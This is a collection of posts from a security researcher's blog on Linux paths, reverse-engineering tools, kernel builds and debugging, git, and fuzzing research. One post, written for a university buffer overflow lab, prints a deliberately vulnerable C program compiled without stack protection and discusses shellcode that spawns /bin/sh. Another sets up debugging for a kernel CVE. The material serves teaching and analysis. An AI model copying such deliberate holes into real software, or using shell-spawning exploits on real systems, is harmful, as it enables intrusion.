PCB Blog

paths in linux

2019-09-10T00:40:10.000Z

Linux has many kinds of “path”, such as the executable search path (PATH), the compiler include path, the linker search path, and the dynamic library search path (LD_LIBRARY_PATH).

PATH

PATH is an environment variable that defines the executable search path. When you run an executable without giving a path (absolute or relative), the shell searches for it in the directories listed in PATH.
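As a rough illustration of the lookup described above, the following Python sketch walks the directories of a PATH-style string in order and returns the first executable match. The function name find_in_path is made up for this example; in practice the standard library's shutil.which does the same job.

```python
import os

def find_in_path(name, path=None):
    """Return the first executable called `name` found in the PATH directories."""
    if path is None:
        path = os.environ.get("PATH", "")
    # A name that already contains a directory part is not searched in PATH.
    if os.sep in name:
        return name if os.access(name, os.X_OK) else None
    for directory in path.split(os.pathsep):
        # An empty PATH entry traditionally means the current directory.
        candidate = os.path.join(directory or ".", name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

print(find_in_path("sh"))
```

Directories earlier in PATH win, which is why the position at which a directory is added matters.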

Initially, PATH is defined in /etc/environment.

$ cat /etc/environment 

PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"

We can append the PATH in the terminal:

export PATH=$PATH:/path/append

We can also append to PATH in .bashrc (if the shell is bash) or .zshrc (if the shell is zsh), so that the appended PATH is available whenever we open a new terminal.

Include Path

gcc looks for headers in several different places [1]. Headers requested with #include are searched for in a list of default directories, which we can print with cpp --verbose:

$ cpp --verbose

#include "..." search starts here:
#include <...> search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/7/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/7/include-fixed
 /usr/x86_64-linux-gnu/include
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.

We can specify the include path when we compile the source code by adding -I/path/to/be/added.

Linker Search Path

To resolve symbols, the linker looks up unresolved symbols in the libraries found on the linker search path.

We can print the default linker search path with gcc -print-search-dirs, post-processed with sed and tr so that only the libraries entry is shown:

$ gcc -print-search-dirs | sed '/^lib/b 1;d;:1;s,/[^/.][^/]*/\.\./,/,;t 1;s,:[^=]*=,:;,;s,;,;  ,g' | tr \; \\012

libraries:
 /usr/lib/gcc/x86_64-linux-gnu/7/:/usr/x86_64-linux-gnu/lib/x86_64-linux-gnu/7/:/usr/x86_64-linux-gnu/lib/x86_64-linux-gnu/:/usr/x86_64-linux-gnu/lib/:/usr/lib/x86_64-linux-gnu/7/:/usr/lib/x86_64-linux-gnu/:/usr/lib/:/lib/x86_64-linux-gnu/7/:/lib/x86_64-linux-gnu/:/lib/:/usr/lib/x86_64-linux-gnu/7/:/usr/lib/x86_64-linux-gnu/:/usr/lib/:/usr/x86_64-linux-gnu/lib/:/usr/lib/:/lib/:/usr/lib/

We can specify the linker search path to gcc by adding -L/path/to/be/added.

We can also pass -B/path/to/directory to gcc, which inserts the given path at the head of the search path list.
For example, with -B/usr/test/:

$ gcc -B/usr/test/ -print-search-dirs | sed '/^lib/b 1;d;:1;s,/[^/.][^/]*/\.\./,/,;t 1;s,:[^=]*=,:;,;s,;,;  ,g' | tr \; \\012

libraries:
  /usr/test/x86_64-linux-gnu/7/:/usr/test/x86_64-linux-gnu/:/usr/test/:/usr/lib/gcc/x86_64-linux-gnu/7/:/usr/x86_64-linux-gnu/lib/x86_64-linux-gnu/7/:/usr/x86_64-linux-gnu/lib/x86_64-linux-gnu/:/usr/x86_64-linux-gnu/lib/:/usr/lib/x86_64-linux-gnu/7/:/usr/lib/x86_64-linux-gnu/:/usr/lib/:/lib/x86_64-linux-gnu/7/:/lib/x86_64-linux-gnu/:/lib/:/usr/lib/x86_64-linux-gnu/7/:/usr/lib/x86_64-linux-gnu/:/usr/lib/:/usr/x86_64-linux-gnu/lib/:/usr/lib/:/lib/:/usr/lib/

LD_LIBRARY_PATH

LD_LIBRARY_PATH is an environment variable that gives the run-time shared library loader (ld.so) an extra set of directories to look in when searching for shared libraries [2].

Reference

[1] Gcc Search Path: https://gcc.gnu.org/onlinedocs/gcc-4.8.0/cpp/Search-Path.html
[2] Why LD_LIBRARY_PATH is bad: http://xahlee.info/UnixResource_dir/_/ldpath.html

Ghidra Python Uses Other Packages

2019-08-22T13:49:08.000Z

Ghidra is an open-source reverse engineering framework, similar to IDA Pro. It provides Java and Python APIs for writing plugins. Its “Python” is actually Jython, at language version 2.7.
Its site-packages location is /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.1/Lib, which only contains some basic packages. I wanted to use other packages (such as protobuf) in Ghidra Python, but I did not find a proper way to install protobuf into Ghidra Jython’s site-packages location.

So I found another way to solve it. First, I installed protobuf for my system’s default Python 2.7.

sudo pip2 install protobuf

protobuf is installed into the Python 2.7 site-packages location. To find that location, open Python 2.7 and type the following:

In [1]: import site
In [2]: print(site.getsitepackages())

['/usr/local/lib/python2.7/dist-packages', '/usr/lib/python2.7/dist-packages']

There are two folders. Add both of them to Ghidra Python’s sys.path by putting the following lines at the start of the Ghidra Python script:

import sys
sys.path.append('/usr/local/lib/python2.7/dist-packages')
sys.path.append('/usr/lib/python2.7/dist-packages')
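
A slightly more defensive variant of the lines above is sketched below. It only appends directories that exist and are not already on sys.path. The helper name add_site_dirs is hypothetical and not part of Ghidra; the code sticks to syntax that works in Python 2.7 (and therefore Jython) as well as Python 3.

```python
import os
import sys

def add_site_dirs(dirs):
    """Append each existing directory to sys.path once; return the ones added."""
    added = []
    for d in dirs:
        if os.path.isdir(d) and d not in sys.path:
            sys.path.append(d)
            added.append(d)
    return added

# The two directories reported by site.getsitepackages() above.
add_site_dirs([
    "/usr/local/lib/python2.7/dist-packages",
    "/usr/lib/python2.7/dist-packages",
])
```

Appending (rather than inserting at the front) keeps Jython's own library directory ahead of the system packages.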

Binaryninja Python Path Install

2019-08-20T22:59:45.000Z

Add the binaryninja Python API to Python's module search path.

First, get Python's default site-packages path:

import site
print(site.getsitepackages()[0])  # output: /usr/local/lib/python3.7/dist-packages

Then, create a new file binaryninja.pth in /usr/local/lib/python3.7/dist-packages and store the binaryninja python path.

Suppose the binaryninja is installed in /opt/binaryninja, then

$ echo "/opt/binaryninja/python" > /usr/local/lib/python3.7/dist-packages/binaryninja.pth
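
To see why a .pth file is enough, the sketch below reproduces the mechanism with throwaway directories. The temporary directories stand in for dist-packages and /opt/binaryninja/python, and demo.pth is a made-up file name. site.addsitedir processes .pth files in the same way Python does for the real site-packages directories at startup.

```python
import os
import site
import sys
import tempfile

# Two throwaway directories stand in for dist-packages and /opt/binaryninja/python.
site_dir = tempfile.mkdtemp()
package_dir = tempfile.mkdtemp()

# A .pth file is plain text with one directory per line.
with open(os.path.join(site_dir, "demo.pth"), "w") as f:
    f.write(package_dir + "\n")

# Process the .pth files found in site_dir; existing directories listed in
# them are appended to sys.path.
site.addsitedir(site_dir)

print(package_dir in sys.path)
```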

Be Careful When Modifying a Binary Program (About Stack Alignment)

2019-07-12T14:53:28.000Z

Recently, I modified a binary program by adding a push rbx instruction to it. The push grows the stack by 8 bytes (rsp decreases by 8), which seemed harmless for the program.

However, when I debugged the modified binary with gdb, it crashed at a movaps instruction:

movaps xmmword ptr [rsp+0x50], xmm0

So what happened?

I found the answer in some blogs (see reference). movaps means “move aligned packed single-precision floating-point values”. If an operand of the instruction is a memory location, its address must be aligned to 16 bytes. I printed $rsp+0x50 and it was not 16-byte aligned. That is because the extra push moved rsp by 8 bytes, so rsp was no longer aligned to 16 bytes.
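
The arithmetic can be checked with a few lines of Python. The stack pointer value is a hypothetical example, chosen only because it is 16-byte aligned.

```python
def is_aligned(address, alignment=16):
    """True if address is a multiple of alignment."""
    return address % alignment == 0

rsp = 0x7FFFFFFFE000        # hypothetical, 16-byte aligned stack pointer
before = rsp + 0x50         # movaps operand address in the original binary
after = (rsp - 8) + 0x50    # same operand after the extra push rbx

print(hex(before), is_aligned(before))
print(hex(after), is_aligned(after))
```

Any patch that shifts rsp by a multiple of 16 (for example a second 8-byte push, or a matching pop before the movaps) keeps the operand aligned.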

Reference

C Programs Before main Function

2019-07-02T14:35:48.000Z

What does the program do before main() function

The picture from Patrick Horgan describes what a C program does before the main function.

crt0.o, crti.o, crtbegin.o, crtn.o

When you compile a C program, the linker links crt0.o, crti.o, crtbegin.o, and crtn.o together with the target object.

crt0.o contains the _start function, which initializes the process before calling main. It is defined in libc’s crt0.s file.

According to osdev, crti.o defines the header of the _init and _fini functions, and crtn.o defines their footer. The linker places the .init and .fini sections of crtbegin.o between those of crti.o and crtn.o.

crtbegin.o also defines some functions such as deregister_tm_clones, register_tm_clones, __do_global_dtors_aux, and frame_dummy.

Reference

git subtree

2019-06-18T22:16:43.000Z

Add a remote repo

git remote add -f repo-name git@github.com:repo.git

Merge the repo into the local git project

git merge -s ours --no-commit --allow-unrelated-histories repo-name/master

Create a new directory named pro-name and copy the git history of the remote repo project into it.

git read-tree --prefix=pro-name/ -u repo-name/master

Commit the changes to keep them safe

git commit -m "subtree merged"

Synchronize with the remote repo

git pull -s subtree repo-name branchname

However, I ran into an “overlaps with” error and had to add -Xsubtree to specify the directory that the sub-project should be pulled into.

git pull -s subtree -Xsubtree=pro-name repo-name branchname

Reference

Compile Kernel using llvm/clang

2019-04-16T20:20:07.000Z

Reference

Tutorial

Start with an empty dir

git clone https://github.com/ramosian-glider/clang-kernel-build.git
cd clang-kernel-build
export WORLD=`pwd`

Install Clang from Chromium:

cd $WORLD
# Instruction taken from http://llvm.org/docs/LibFuzzer.html
mkdir TMP_CLANG
cd TMP_CLANG
git clone https://chromium.googlesource.com/chromium/src/tools/clang
cd ..
TMP_CLANG/clang/scripts/update.py

(To update Clang later on, do (cd TMP_CLANG/clang ; git pull) and run update.py again.)

Clone the linux source tree

cd $WORLD
git clone git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git
cd linux-stable
git reset --hard v4.16

(Note: kernel v4.16 or older is fine. Newer kernels require asm-goto support, which the latest clang lacks even though LLVM already supports it; see ref1 and ref2.)

Configure and build the kernel

cd $WORLD
export CLANG_PATH=`pwd`/third_party/llvm-build/Release+Asserts/bin/
cd linux-stable
make CC=$CLANG_PATH/clang defconfig
make CC=$CLANG_PATH/clang kvmconfig
make CC=$CLANG_PATH/clang -j64 2>&1 | tee build.log

Set up the VM

cd $WORLD
wget https://raw.githubusercontent.com/google/sanitizers/master/address-sanitizer/kernel_buildbot/create_os_image.sh
# create_os_image.sh requires sudo
sh create_os_image.sh

Run the VM

cd $WORLD
./run_qemu.sh
# in a separate console:
ssh -i ssh/id_rsa -p 10023 root@localhost

Compile with KASAN

Edit the .config file and add:

CONFIG_KASAN=y

Regenerate the config file:

make oldconfig

Problems

undefined reference to `bcmp`

Solutions: reference

Add ‘-fno-builtin-bcmp’ to CLANG_FLAGS

compiler lacks asm-goto support

reference: ref1, ref2, ref3

Although LLVM already supports asm-goto, it seems that clang does not support it yet.

Kernel v4.16 and earlier versions do not have the asm-goto problem.

Boot problem when compiling the kernel with clang and KASAN

Solutions: ref

Some configuration options may cause problems with a clang build

Adding CONFIG_KALLSYMS_ALL=y causes the boot to fail with “Failed to start Raise network interfaces”.
Adding CONFIG_KASAN_INLINE=y causes the boot to fail with “Failed to start Raise network interfaces”.

With CONFIG_DEBUG_VM added, the boot hangs at:

[    0.000000] Booting paravirtualized kernel on KVM
[    0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1910969940391419 ns
[    0.000000] setup_percpu: NR_CPUS:64 nr_cpumask_bits:64 nr_cpu_ids:4 nr_node_ids:1
[    0.000000] percpu: Embedded 53 pages/cpu @        (ptrval) s178760 r8192 d30136 u524288
[    0.000000] KVM setup async PF for cpu 0
[    0.000000] kvm-stealtime: cpu 0, msr 3641e3c0
[    0.000000] Built 1 zonelists, mobility grouping on.  Total pages: 257895
[    0.000000] Policy zone: DMA32
[    0.000000] Kernel command line: console=ttyS0 root=/dev/sda earlyprintk=serial
[    0.000000] Memory: 825300K/1048052K available (26636K kernel code, 1382K rwdata, 4256K rodata, 1804K init, 21016K bss, 222752K reserved, 0K cma-reserved)

clang error: unknown argument: ‘-mpreferred-stack-boundary=4’

link

The files drivers/gpu/drm/amd/display/dc/calcs/Makefile and drivers/gpu/drm/amd/display/dc/dml/Makefile set CFLAGS with -mpreferred-stack-boundary=4, which clang does not support. Clang's counterpart is -mstack-alignment, which takes the alignment in bytes rather than as a power of two, so the equivalent of -mpreferred-stack-boundary=4 (2^4 = 16 bytes) is -mstack-alignment=16. Replace the flag in these two files accordingly.

clang does not support VLAIS (variable-length arrays in structs)

Comment out CONFIG_EXOFS_FS.

link

Undefined reference in amdgpu.ko

link
patch

shellcode exit normally

2019-03-22T16:46:12.000Z

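Preface

Recently, while jaguo and I were preparing a buffer overflow lab for the software security course at Nanjing University, we ran into a case where the shellcode exited normally, but we did not “see” a new shell being started.

Vulnerable program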

// buf2.c
// gcc -z execstack -o buf2 buf2.c -fno-stack-protector
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void vul(char *str){
    char buffer[36];
    // buffer overflow
    strcpy(buffer, str);
}

int main(int argc, char **argv){
    char str[128];
    int n = read(0, str, 128);
    if(n < 0){
        printf("Read Error\n");
        exit(-1);
    }
    vul(str);
    printf("Returned Properly\n");
    return 0;
}

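Our initial design used the vulnerable program shown above. Because the shellcode has to be injected and contains non-printable characters, we first wrote it to a file named attack_input and then used input redirection to feed that file to the program:

./buf2 < attack_input

The shellcode was injected correctly, but as soon as it executed execve("/bin//sh", 0, 0), the /bin//sh program exited immediately instead of presenting an interactive shell prompt.

Cause

After some research we found that input redirection points the standard input of the process at the file. Once the program has read everything in the file, the input is exhausted, which is effectively the same as stdin being closed.
The shell that the process starts inherits its file descriptors, including the standard input that is already closed or at end-of-file. The shell finds nothing to read on standard input and exits.

We can verify this with the following experiment: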


#include <stdio.h>
#include <stdlib.h>
int main(){
    fclose(stdin);      // the shell started below inherits a closed stdin
    system("/bin/sh");
}

Compile and run this program, and the shell likewise exits normally right away.
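
The same behaviour can be reproduced without the vulnerable program. The Python sketch below assumes a POSIX system with /bin/sh. It starts a shell whose standard input is immediately at end-of-file, which is what the shell sees once the redirected file has been consumed.

```python
import subprocess

# stdin=DEVNULL gives the shell an input that is at end-of-file from the start.
result = subprocess.run(["/bin/sh"], stdin=subprocess.DEVNULL, timeout=10)

# The shell reads EOF instead of a command, so it returns at once.
print("shell exit status:", result.returncode)
```

The shell does not fail; it simply has nothing to read, which matches the “exit normally” symptom.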

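Solution

Our solution is to read the shellcode from the file with ordinary file-reading functions, so that standard input stays attached to the terminal.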



// buf2.c
// gcc -z execstack -o buf2 buf2.c -fno-stack-protector

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void vul(char *str){
    char buffer[36];
    // buffer overflow
    strcpy(buffer, str);
}

int main(int argc, char **argv){
    char str[128];
    FILE *file;
    file = fopen("attack_input2", "r");
    fread(str, sizeof(char), 128, file);
    vul(str);
    printf("Returned Properly\n");
    return 0;
}

Analyzing CVE-2017-8890

2019-01-06T01:28:58.000Z

Environment

Linux kernel version: 4.10.1
gcc version: 7.4

Enable KASAN and debug info in the Linux kernel

CONFIG_KCOV=y
CONFIG_DEBUG_INFO=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y

CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y

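The build fails with ‘undefined reference to `____ilog2_NaN’’.

Solution: patch. Save the patch as patch.diff and copy it to the root directory of the Linux kernel tree.

Run patch -i patch.diff. When prompted for the file to patch, enter include/linux/log2.h and then tools/include/linux/log2.h.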

Debug

Compile the Linux kernel

CONFIG_DEBUG_KERNEL=y
CONFIG_DEBUG_INFO=y

CONFIG_CONSOLE_POLL=y
CONFIG_KDB_CONTINUE_CATASTROPHIC=0
CONFIG_KDB_DEFAULT_ENABLE=0x1
CONFIG_KDB_KEYBOARD=y
CONFIG_KGDB=y
CONFIG_KGDB_KDB=y
CONFIG_KGDB_LOW_LEVEL_TRAP=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_KGDB_TESTS=y
CONFIG_KGDB_TESTS_ON_BOOT=n
CONFIG_MAGIC_SYSRQ=y
CONFIG_MAGIC_SYSRQ_DEFAULT_ENABLE=0x1
CONFIG_SERIAL_KGDB_NMI=n

Add to your QEMU command:

-append 'kgdbwait kgdboc=ttyS0,115200' \
-serial tcp::1234,server,nowait

Connect with gdb

gdb vmlinux
target remote :1234
c

PoC

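poc
Run the PoC inside the QEMU virtual machine.
A crash occurs:

The crash shows an access to the address (rcx+rax), which is not an accessible memory region.

Set a breakpoint manually
- echo g > /proc/sysrq-trigger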

Debugging a QEMU Kernel with gdb

2019-01-03T15:54:43.000Z

Compile the Linux kernel

Download the kernel source

git clone https://github.com/torvalds/linux.git $KERNEL

Generate the default configuration

cd $KERNEL
make defconfig
make kvmconfig

Edit .config and enable some options

# gdb config
CONFIG_GDB_SCRIPTS=y
CONFIG_DEBUG_INFO=y
# CONFIG_DEBUG_INFO_REDUCED is not set
# CONFIG_RANDOMIZE_BASE is not set

# kgdb config
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y

# kdb config
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y

# manually debug using the SysRq-G
CONFIG_MAGIC_SYSRQ=y

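Regenerate the config file. It asks about some sub-options, for which the defaults are fine.

make oldconfig

Build the kernel with GCC

make -j$(nproc)

Debugging with gdb

Add the option ‘-gdb tcp::1234’ when starting QEMU.
Add ‘nokaslr’ to the kernel command line.

A reference QEMU configuration: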

qemu-system-x86_64 -S -smp 2 -m 4G -enable-kvm -cpu host \
    -net nic -net user,hostfwd=tcp::10022-:22 \
    -gdb tcp::1234 \
    -kernel ./kernel/arch/x86/boot/bzImage -nographic \
    -device virtio-scsi-pci,id=scsi \
    -device scsi-hd,bus=scsi.0,drive=d0 \
    -drive file=wheezy.img,format=raw,if=none,id=d0 \
    -append "root=/dev/sda nokaslr"

gdb commands:

gdb vmlinux
target remote :1234
c

Debugging with kgdb and kdb

A reference QEMU configuration:

qemu-system-x86_64 -smp 2 -m 4G -enable-kvm -cpu host \
    -net nic -net user,hostfwd=tcp::10022-:22 \
    -kernel ./kernel/arch/x86/boot/bzImage -nographic \
    -device virtio-scsi-pci,id=scsi \
    -device scsi-hd,bus=scsi.0,drive=d0 \
    -drive file=wheezy.img,format=raw,if=none,id=d0 \
    -append "root=/dev/sda nokaslr kgdbwait kgdboc=ttyS0,115200" \
    -serial tcp::1234,server,nowait

Force a breakpoint:
Open a terminal connected to the system running in QEMU and run the following as root:

echo g > /proc/sysrq-trigger

Local Conflicts in git

2018-11-28T03:56:04.000Z

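When several people collaborate through git, you usually pull first and then commit and push to avoid conflicts. But what if the pulled files conflict with your local changes? This is where “git stash” comes in handy:

First, stash the local changes

git stash

Pull the contents of the remote repository

git pull

At this point the local files match the contents of the remote repository

Restore the stashed changes

git stash pop stash@{0}

Resolve conflicts manually

git now reports the conflicts and asks you to resolve them manually.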

fuzzing related work

2018-10-05T19:09:11.000Z

Interesting Fuzzing
Directed Fuzzing
- Directed Greybox Fuzzing(CCS 17)
- Hawkeye: Towards a Desired Directed Grey-box Fuzzer(CCS 18)
Fuzzing Machine Learning Model
- TensorFuzz: Debugging Neural Networks with Coverage-Guided Fuzzing(18)
- Coverage-Guided Fuzzing for Deep Neural Networks
Kernel Fuzzing
Anti-Fuzzing
- FUZZIFICATION: Anti-Fuzzing Techniques(Usenix Security 19)
- ANTIFUZZ: Impeding Fuzzing Audits of Binary Executables(Usenix Security 19)
IoT Fuzzing
- IoTFuzzer: Discovering Memory Corruptions in IoT Through App-based Fuzzing(NDSS 18)
- FIRM-AFL: High-Throughput Greybox Fuzzing of IoT Firmware via Augmented Process Emulation(Usenix Security 19)
Evaluate Fuzzing
- Evaluating Fuzz Testing(CCS 18)

Interesting Fuzzing

Coverage-based Greybox Fuzzing as Markov Chain(CCS 16)

Search Strategy
Power Schedule
By changing the two components above, the fuzzer becomes more likely to reach low-density regions.

T-Fuzz: fuzzing by program transformation(oakland 18)

Fuzzer: T-Fuzz uses an existing coverage-guided fuzzer to generate inputs. T-Fuzz depends on the fuzzer to keep track of the paths taken by all the generated inputs and of real-time status information regarding whether it is “stuck”. As output, the fuzzer produces all the generated inputs. Any identified crashing inputs are recorded for further analysis.
Program Transformer: When the fuzzer gets “stuck”, T-Fuzz invokes its Program Transformer to generate transformed programs. Using the inputs generated by the fuzzer, the Program Transformer first traces the program under test to detect the NCC (non-critical check) candidates and then transforms copies of the program by removing certain detected NCC candidates.
Crash Analyzer: For crashing inputs found against the transformed programs, the Crash Analyzer filters false positives using a symbolic-execution based analysis technique.

T-Fuzz Design

Detecting NCCs: NCCs are those sanity checks which are present in the program logic to filter some orthogonal data, e.g., the check for a magic value in a decompressor. NCCs can be removed without triggering spurious bugs as they are not intended to prevent bugs. This paper uses a lightweight method to find the NCCs. First, the authors define the concept of boundary edges: the edges connecting the nodes that were covered by the fuzzer-generated inputs and those that were not. This method over-approximates the set of NCCs, so the authors use two ways to prune undesired NCC candidates.
Program Transformation: After finding NCCs, T-Fuzz “removes” the NCC conditions to steer the execution to the other branch. T-Fuzz transforms programs by replacing the detected NCC candidates with negated conditional jumps.
Filtering out False Positives and Reproducing Bugs: As the removed NCC candidates might be meaningful guards in the original program (as opposed to, e.g., magic number checks), removing detected NCC edges might introduce new bugs in the transformed program. Consequently, T-Fuzz’s Crash Analyzer verifies that each bug in the transformed program is also present in the original program, thus filtering out false positives. The Crash Analyzer uses a transformation-aware combination of the preconstrained tracing technique leveraged by Driller and the Path Kneading techniques proposed by ShellSwap to collect path constraints of the original program by tracing the program path leading to a crash in the transformed program.

CollAFL: Path Sensitive Fuzzing(oakland 18)

paper
source code has not been found.

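The paper makes two main improvements to AFL:

AFL is a coverage-based greybox fuzzer. It instruments the target program lightly to track which paths each fuzzing input covers, and hashes the paths to decide whether an input reaches a new path. An input that reaches a new path is considered good and is kept as a seed. However, hash collisions can cause an input that reaches a new path not to be kept as a seed. The paper targets this problem with a new algorithm that resolves the path hash collisions, and the improvement is significant.
It provides several strategies for prioritizing seeds so that the fuzzer is pushed towards unexplored paths. Specifically, if a path has many unexplored neighbor branches, the corresponding input is mutated more; if a path has many unexplored neighbor descendants, the corresponding input is mutated more. A further strategy helps find more vulnerabilities: if a path performs many memory accesses, the corresponding input is mutated more.

In my opinion, the main contribution of the paper is a mechanism that resolves path hash collisions, which makes the coverage measurement more accurate.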

AFL Coverage Measurements

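AFL uses a bitmap (64 KB by default) to track edge coverage. Each byte corresponds to the hit count of a particular edge. AFL instruments every basic block and assigns each one a random ID. When a path is executed, every basic block on the path performs the following operations:

cur_location = <COMPILE_TIME_RANDOM>;
shared_mem[cur_location ^ prev_location]++;
prev_location = cur_location >> 1;

The right shift of prev_location is mainly there to distinguish the path A->B from B->A. Because the basic block IDs are assigned randomly, this hashing scheme is prone to collisions, and the collision rate grows as the program gets larger.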
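
The effect of the shift, and how quickly collisions appear, can be tried out with a small Python model of the three instrumentation lines above. This is only a simulation with randomly generated IDs, not AFL code; edge_index and count_collisions are names chosen for this sketch.

```python
import random

MAP_SIZE = 1 << 16  # 64 KB bitmap, the default size mentioned above

def edge_index(prev_id, cur_id, shift=True):
    """Bitmap index for the edge prev_id -> cur_id."""
    prev_location = prev_id >> 1 if shift else prev_id
    return (cur_id ^ prev_location) % MAP_SIZE

def count_collisions(num_edges, seed=0):
    """Count edges whose index was already taken by an earlier random edge."""
    rng = random.Random(seed)
    seen = set()
    collisions = 0
    for _ in range(num_edges):
        index = edge_index(rng.randrange(MAP_SIZE), rng.randrange(MAP_SIZE))
        if index in seen:
            collisions += 1
        seen.add(index)
    return collisions

A, B = 0x1234, 0x5678  # arbitrary example block IDs
print(edge_index(A, B) != edge_index(B, A))                            # shift: distinct
print(edge_index(A, B, shift=False) == edge_index(B, A, shift=False))  # no shift: same

for n in (1000, 10000, 50000):
    print(n, "edges ->", count_collisions(n), "collisions")
```

Without the shift, XOR is symmetric, so A->B and B->A always share a slot. The collision counts grow quickly as the number of edges approaches the map size.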

CollAFL’s Solution to Hash Collision

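CollAFL resolves hash collisions in three ways:

A greedy algorithm assigns x and y values to each basic block so that every edge gets a distinct hash value.
If a basic block has only one predecessor, that is, only one edge reaches it, the ID of the basic block itself is used to represent the edge.
If neither of the two methods above works, each remaining edge is assigned a distinct ID at runtime.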

Driller: Augmenting Fuzzing Through Selective Symbolic Execution(ndss 16)

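It is well known that fuzzing easily generates inputs that satisfy loose constraints (such as x > 0) through mutation, while symbolic execution is very good at solving for magic values (such as x == deadleaf). This is a classic paper on combining concolic execution with fuzzing. Its main idea is to first let a fuzzer such as AFL mutate seeds to test the program. When the generated inputs keep following the same paths and no new path is discovered, the fuzzer is “stuck”. At that point concolic execution is used to generate inputs that are guaranteed to reach new branches. In this way concolic execution assists the fuzzer.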

VUzzer: Application-aware Evolutionary Fuzzing(ndss 17)

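VUzzer is widely regarded as one of the better AFL-like fuzzers. It mainly uses data-flow features and control-flow features to guide mutation and seed selection.

Data-flow features

It uses dynamic taint analysis to infer the structure and types of the input, as well as the offsets of particular data in the input. For example, it instruments every cmp instruction to determine which input bytes are involved in the comparison and which value they are compared against. VUzzer can also instrument lea instructions to detect whether an index operation depends on certain input bytes.

Control-flow features

Control-flow features let VUzzer infer the importance of an execution path. For example, some execution paths end up in error-handling blocks, and VUzzer identifies such error-handling code statically. VUzzer also assigns a specific weight to each basic block to push the fuzzer towards deeper paths.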

Angora: Efficient Fuzzing by Principled Search(oakland 18)

This paper’s contributions:

Context-sensitive branch coverage. AFL uses context-insensitive branch coverage to approximate program states. This paper adds context information to each branch.
Scalable byte-level taint tracking. Most path constraints depend on only a few bytes in the input. By tracking which input bytes flow into each path constraint, Angora mutates only these bytes instead of the entire input, therefore reducing the space of exploration substantially.
Search based on gradient descent. When mutating the input to satisfy a path constraint, Angora avoids symbolic execution, which is expensive and cannot solve many types of constraints. Instead, Angora uses the gradient descent algorithm popular in machine learning to solve path constraints.
Type and shape inference. Many bytes in the input are used collectively as a single value in the program, e.g., a group of four bytes in the input used as a 32-bit signed integer in the program. To allow gradient descent to search efficiently, Angora locates the above group and infers its type.
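
The gradient-descent idea can be illustrated with a toy example. The sketch below is not Angora's implementation: it treats a hypothetical branch condition a + 3*b == 100 as a black-box “distance to satisfied” function, estimates the gradient by finite differences, and moves every input by the sign of its gradient component with a shrinking step size. All names are made up for this example.

```python
def numeric_gradient(f, x):
    """Finite-difference gradient of a black-box integer function f at x."""
    base = f(x)
    grad = []
    for i in range(len(x)):
        bumped = list(x)
        bumped[i] += 1
        grad.append(f(bumped) - base)
    return grad

def sign(v):
    return (v > 0) - (v < 0)

def descend(f, x, max_iters=1000):
    """Search for x with f(x) == 0 by stepping against the gradient sign."""
    x = list(x)
    for _ in range(max_iters):
        if f(x) == 0:
            return x
        grad = numeric_gradient(f, x)
        step = 1024
        while step >= 1:
            candidate = [xi - step * sign(gi) for xi, gi in zip(x, grad)]
            if f(candidate) < f(x):
                x = candidate
                break
            step //= 2
        else:
            return None  # no improving step found: stuck in a local minimum
    return None

# Hypothetical branch `if (a + 3*b == 100)` expressed as a distance to minimize.
def distance(values):
    a, b = values
    return abs(a + 3 * b - 100)

solution = descend(distance, [0, 0])
print(solution, distance(solution))
```

The search only ever calls the function on concrete inputs, which is why this style of solving needs no symbolic model of the constraint. It can still get stuck in local minima, which the sketch reports by returning None.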

Designing New Operating Primitives to Improve Fuzzing Performance(CCS 17)

AFL Overview

Mutating inputs(1). AFL uses an evolutionary coverage-based mutation technique to generate test cases for discovering new execution paths of the target application. In AFL, an execution path is represented as a sequence of taken branches(i.e., a coverage bitmap) in the target instance for a given input. To track whether a branch is taken, AFL instruments every conditional branch and function entry of the target application at the time of compilation.
Launching the target application(2). Traditional fuzzers call fork() followed by execve() to launch an instance of the target application. This process occurs in every fuzzing loop to deliver a new input to the target application. It is not only time consuming, but also a non-scalable operation. Previous research shows that the majority of fuzzing execution explores only the shallow part of the code and terminates quickly(e.g., because of invalid input format), which results in frequent executions for the input cases. Thus, the cost of fork() and execve() dominates the cost of fuzzing. To mitigate this cost, AFL introduced a fork server, which is similar to a Zygote process in Android that eliminates the heavyweight execve() system call. After instantiating a target application, the fork server waits for a starting signal sent over the pipe from the AFL instance. Upon receiving the request, it first clones the already-loaded program using fork() and the child process continues the execution of the original target code immediately from the entry point(i.e., main) with a given input generated for the current fuzzing loop. The parent process waits for the termination of its child, and then informs the AFL process. The AFL process collects the branch coverage of the past execution, and maintains the test input if it is interesting.
Bookkeeping results(3, 4). The fork server also initializes a shared memory(also known as tracing bitmap) between the AFL instance and the target application. The instance records all the coverage information during the execution and writes it to the shared tracing bitmap, which summarizes the branch coverage of the past execution.
Fuzzing in parallel(6). AFL also supports parallel fuzzing to completely utilize resources available on a multi-core machine and expedite the fuzzing process. In this case, each AFL instance independently executes without explicit contention among themselves(i.e., embarrassingly parallel). From the perspective of the design of AFL, the fuzzing operation should linearly scale with increasing core count. Moreover, to avoid apparent contention on file system accesses, each AFL instance works in its private working directory for test cases. At the end of a fuzzing loop, the AFL instance scans the output directories of other instances to learn their test cases, called the syncing phase. For each collaborating neighbor, it keeps a test case identifier, which indicates the last test case it has checked. It figures out all the test cases that have an identifier larger than the reserved one, and re-executes them one by one. If a test case covers a new path that has not been discovered by the instance itself, the test case is copied to its own directory for further mutation.

QSYM: A Practical Concolic Execution Engine Tailored for Hybrid Fuzzing(Usenix 18)

